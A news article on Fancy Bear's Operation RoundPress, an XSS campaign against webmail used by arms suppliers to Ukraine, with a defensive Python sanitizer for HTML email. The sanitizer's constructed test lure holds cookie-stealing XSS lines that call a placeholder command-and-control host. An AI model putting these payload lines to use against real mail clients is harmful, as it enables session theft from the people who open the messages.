
Cybercriminals prey on Ukrainian weapon suppliers


The latest cyberattack troubling Ukraine comes courtesy of the notorious Russian hacker group Fancy Bear. A recent report by ESET, a cybersecurity firm based in Bratislava, Slovakia, sheds light on the campaign: the group has launched a targeted offensive against companies supplying Ukraine with weapons for its defence against Russia's invasion. Manufacturers of Soviet-era weaponry in Bulgaria, Romania and Ukraine, as well as arms factories in Africa and South America, have been in its crosshairs.

Fancy Bear, also known by aliases such as Sednit or APT28, has a long record of intrusions, including attacks on the German Bundestag (2015), US politician Hillary Clinton (2016), and the SPD headquarters (2023). Experts consider the group an extension of the Russian intelligence services, using cyberattacks as instruments of political influence and destabilization. Its repertoire includes espionage and targeted disinformation campaigns against Western democracies.

Operation RoundPress

Fancy Bear's attack emails are often disguised as news articles from credible sources such as the Kyiv Post or the Bulgarian news portal News.bg. In the current espionage campaign, which ESET calls Operation RoundPress, the group exploited cross-site scripting (XSS) flaws in popular webmail software: Roundcube, Zimbra, Horde and MDaemon. Most of these vulnerabilities had already been fixed by the vendors and could have been closed had companies kept their webmail servers up to date. In some cases, however, the affected companies had no defence, because the attackers exploited a previously unknown flaw in MDaemon, CVE-2024-11182, a zero-day that surfaced in November 2024[1][2][3][5].

The malicious code is hidden in the HTML body of the email. As soon as the recipient opens the message in a browser-based webmail client, the vulnerable client runs the embedded script; because nothing has to be clicked or downloaded, spam filters and the user's own caution are both sidestepped. ESET researchers named the MDaemon variant of this payload SpyPress.MDAEMON. It can steal credentials, read and exfiltrate emails, and even circumvent two-factor authentication (2FA), the extra layer of security that requires a second proof of identity besides a password. Fancy Bear got around 2FA in several instances by creating application passwords, which grant persistent access to the mailbox without a second factor ever being prompted.

"Many companies neglect their webmail servers' maintenance," states ESET researcher Matthieu Faou. "Merely reading an email in a browser can execute malware, without the recipient actively clicking anything."
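The defect class behind this campaign is the webmail client rendering HTML mail without neutralising active content. The example below is added to this article and is not ESET's, MDaemon's or any other vendor's code: it shows the check that a patched webmail client (or a mail gateway in front of an unpatched one) has to perform, an allowlist sanitizer that strips script tags, event-handler attributes and javascript: URLs from an HTML body, and a scanner that reports what would have executed. The sample "news article" lure, the hostnames and the addresses are constructed for the example; the sample is not a real RoundPress payload.

```python
"""Allowlist sanitizer for HTML e-mail bodies plus a scanner that flags messages
carrying active content. Example code written for this article; the sample
message below is constructed and is not a real RoundPress payload."""
import email
from email import policy
from email.message import EmailMessage
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Tags a webmail client can render safely; anything else is dropped but its
# text is kept, except for DROP_WITH_CONTENT elements, whose content is removed.
ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "a", "img", "ul", "ol",
                "li", "table", "tr", "td", "th", "div", "span", "h1", "h2", "h3",
                "blockquote"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "svg", "math",
                     "noscript"}


def safe_url(value):
    """Allow only relative, http(s) and mailto URLs. Whitespace and control
    characters are removed first: browsers ignore them inside a scheme
    ("java\\tscript:"), so a naive prefix check would be fooled."""
    cleaned = "".join(ch for ch in (value or "") if ch.isprintable() and not ch.isspace())
    try:
        return urlsplit(cleaned).scheme.lower() in {"", "http", "https", "mailto"}
    except ValueError:  # malformed URL (e.g. bad IPv6 literal): treat as unsafe
        return False


class EmailSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.active = []   # active content removed: the signal a scanner wants
        self.dropped = []  # harmless markup outside the allowlist
        self._skip = 0     # > 0 while inside a DROP_WITH_CONTENT element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.active.append(f"tag:{tag}")
            self._skip += 1
            return
        if self._skip:
            return
        if tag not in ALLOWED_TAGS:
            self.dropped.append(f"tag:{tag}")
            return
        kept = []
        for name, value in attrs:  # HTMLParser lower-cases names and decodes entities
            if name.startswith("on"):                        # onerror, onload, ...
                self.active.append(f"attr:{tag}@{name}")
            elif name not in ALLOWED_ATTRS.get(tag, set()):  # style, id, class, ...
                self.dropped.append(f"attr:{tag}@{name}")
            elif name in ("href", "src") and not safe_url(value):
                self.active.append(f"url:{tag}@{name}")
            else:
                kept.append(f' {name}="{escape(value or "", quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_startendtag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self.active.append(f"tag:{tag}")  # self-closing: no content to skip
        else:
            self.handle_starttag(tag, attrs)  # <br/>: no closing tag needed

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag in ALLOWED_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data, quote=False))  # re-escape decoded text

    def result(self):
        self.close()
        return "".join(self.out)


def scan_message(raw):
    """Parse an RFC 5322 message, sanitize its HTML body and report what would
    have executed in a webmail client that renders the body verbatim."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("html",))
    if body is None:
        return {"suspicious": False, "active": [], "clean_html": None}
    s = EmailSanitizer()
    s.feed(body.get_content())
    return {"suspicious": bool(s.active), "active": s.active, "clean_html": s.result()}


# Constructed lure: a fake news item with an onerror handler, an inline script
# and a javascript: link next to legitimate markup. Hostnames are placeholders.
SAMPLE_HTML = """<h1>Defence ministry confirms new artillery contract</h1>
<p>Full story at <a href="https://news.example.invalid/story/1">news.example.invalid</a>.</p>
<img src="x" onerror="fetch('https://c2.example.invalid/?c='+document.cookie)">
<script>document.location='https://c2.example.invalid/'+document.cookie</script>
<p><a href="javascript:alert(1)">Read more</a></p>
"""


def build_sample_lure():
    msg = EmailMessage()
    msg["From"] = "newsdesk@news.example.invalid"
    msg["To"] = "export-sales@arms-maker.example.invalid"
    msg["Subject"] = "Defence ministry confirms new artillery contract"
    msg.set_content("Plain-text version of the story.")
    msg.add_alternative(SAMPLE_HTML, subtype="html")
    return msg.as_bytes()


if __name__ == "__main__":
    report = scan_message(build_sample_lure())
    print("suspicious:", report["suspicious"])
    for item in report["active"]:
        print("  stripped active content:", item)
    print(report["clean_html"])
```

The sanitizer is an allowlist, not a blocklist: an unknown tag or attribute is dropped by default, so a new XSS trick in the client's parser has fewer places to hide. The `active` list separates what matters to a defender (script, event handlers, scriptable URLs) from cosmetic markup that was merely outside the allowlist, which keeps a gateway rule such as "quarantine if active is non-empty" from drowning in false positives. It is a compensating control, not a replacement for patching the webmail server.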

  1. The Russia-based hacker group Fancy Bear launched a targeted offensive against arms manufacturers in countries including Ukraine, Bulgaria and Romania, as well as in Africa and South America, to gain access to sensitive information related to Soviet-era weapons.
  2. ESET, a cybersecurity firm based in Bratislava, Slovakia, revealed that Fancy Bear disguised its attack emails as news articles from credible sources and exploited flaws in popular webmail software, including Roundcube, Zimbra, Horde and MDaemon; one of them, CVE-2024-11182 in MDaemon, was a previously unknown vulnerability identified in November 2024.
  3. ESET researcher Matthieu Faou stated that many companies neglect their webmail servers' maintenance, so that merely opening a manipulated email in a browser can execute malware; according to ESET, the malware evades spam filters and can even subvert two-factor authentication (2FA).
